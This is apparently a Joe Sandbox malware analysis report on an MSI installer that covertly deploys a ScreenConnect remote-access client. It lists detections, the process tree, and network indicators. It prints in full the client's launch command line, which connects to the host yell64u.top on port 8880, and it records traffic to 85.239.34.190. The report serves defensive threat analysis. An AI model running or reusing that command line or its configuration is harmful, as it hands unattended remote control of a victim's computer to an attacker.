Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.msi

Overview

General Information

Sample name:setup.msi
Analysis ID:1555428
MD5:ed78bad542629e617ae49dfeffabcfcc
SHA1:bf5efe919b3c3561c433d9d4cd0f323a9359017e
SHA256:86231cca7231e3905a7317d07350c19f3923e24f34732c0aa6c022599913b1a3
Infos:

Detection

ScreenConnect Tool
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • msiexec.exe (PID: 7028 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\setup.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7128 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6292 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F119A6F073F792F7D0ECEED6C10FA13E C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 4820 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSID3F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6032843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 1420 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 5DD10B1CF791748F5CDE2E7F0943941D MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 2188 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding B2E11333BB1052CECFB49C593AC661A5 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 1344 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=c74b013c-c400-4ba6-a343-b7faf5e5e46a&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=DXBLeave&c=&c=&c=&c=&c=&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 4888 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "c21e480d-13f5-4799-892b-1b4075726758" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 3868 cmdline: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "8bc7d613-b74f-4d66-a18a-de9574d5dc1b" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Config.Msi\5c1176.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Windows\Installer\MSI15E9.tmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        SourceRuleDescriptionAuthorStrings
        00000007.00000000.1702671144.0000000000282000.00000002.00000001.01000000.00000010.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          00000007.00000002.2905272548.00000000024D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            00000008.00000002.1743451963.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Process Memory Space: rundll32.exe PID: 4820JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4888JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  Click to see the 1 entries
                  SourceRuleDescriptionAuthorStrings
                  7.2.ScreenConnect.WindowsClient.exe.254fa20.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    7.0.ScreenConnect.WindowsClient.exe.280000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      8.2.ScreenConnect.WindowsClient.exe.2e5fa60.4.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=c74b013c-c400-4ba6-a343-b7faf5e5e46a&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=DXBLeave&c=&c=&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=c74b013c-c400-4ba6-a343-b7faf5e5e46a&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=DXBLeave&c=&c=&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=c74b013c-c400-4ba6-a343-b7faf5e5e46a&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=DXBLeave&c=&c=&c=&c=&c=&c=&c=", ProcessId: 1344, ProcessName: ScreenConnect.ClientService.exe
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (de5851ad6e374ce3) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 7128, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-406F-012C01771397}\(Default)
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-13T21:32:24.311224+010020229301A Network Trojan was detected20.12.23.50443192.168.2.449731TCP
                        2024-11-13T21:33:02.882749+010020229301A Network Trojan was detected20.12.23.50443192.168.2.449737TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.3% probability
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_03E016F8 CryptProtectData,6_2_03E016F8
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_03E016F1 CryptProtectData,6_2_03E016F1
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_051A2E10 CryptUnprotectData,6_2_051A2E10
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_051A2E08 CryptUnprotectData,6_2_051A2E08
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1743177364.0000000001432000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Client.dll.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000002.2905272548.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1743451963.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1743291281.00000000014D2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1743239856.0000000001490000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1702671144.0000000000282000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr
                        Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000006.00000000.1693323566.000000000058D000.00000002.00000001.01000000.0000000A.sdmp, ScreenConnect.ClientService.exe.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1745717317.000000001BCB2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000003.00000003.1671136153.0000000004B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668960516.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.3.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.3.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: setup.msi, MSI15E9.tmp.1.dr, 5c1176.rbs.1.dr, MSI160A.tmp.1.dr, 5c1175.msi.1.dr, MSI17FF.tmp.1.dr, 5c1177.msi.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr
                        Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr
                        Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1702671144.0000000000282000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.3.dr
                        Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: setup.msi, 5c1175.msi.1.dr, MSID3F.tmp.0.dr, 5c1177.msi.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1745717317.000000001BCB2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.Windows.dll.3.dr, ScreenConnect.Windows.dll.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1743177364.0000000001432000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Client.dll.1.dr
                        Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr
                        Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.1.dr
                        Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: rundll32.exe, 00000003.00000003.1668960516.0000000004CFC000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1745103235.000000001BA72000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll.3.dr
                        Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                        Networking

                        barindex
                        Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                        Source: global trafficTCP traffic: 192.168.2.4:49730 -> 85.239.34.190:8880
                        Source: Joe Sandbox ViewASN Name: RAINBOW-HKRainbownetworklimitedHK RAINBOW-HKRainbownetworklimitedHK
                        Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49737
                        Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49731
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: yell64u.top
                        Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2909894070.00000000125EE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                        Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.2909894070.00000000125EE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: ScreenConnect.ClientService.exe, 00000006.00000002.2909899483.0000000002777000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1744539178.0000000012DF0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.1.dr, ScreenConnect.WindowsCredentialProvider.dll.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: ScreenConnect.ClientService.exe, 00000006.00000002.2905919832.0000000001952000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1743451963.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
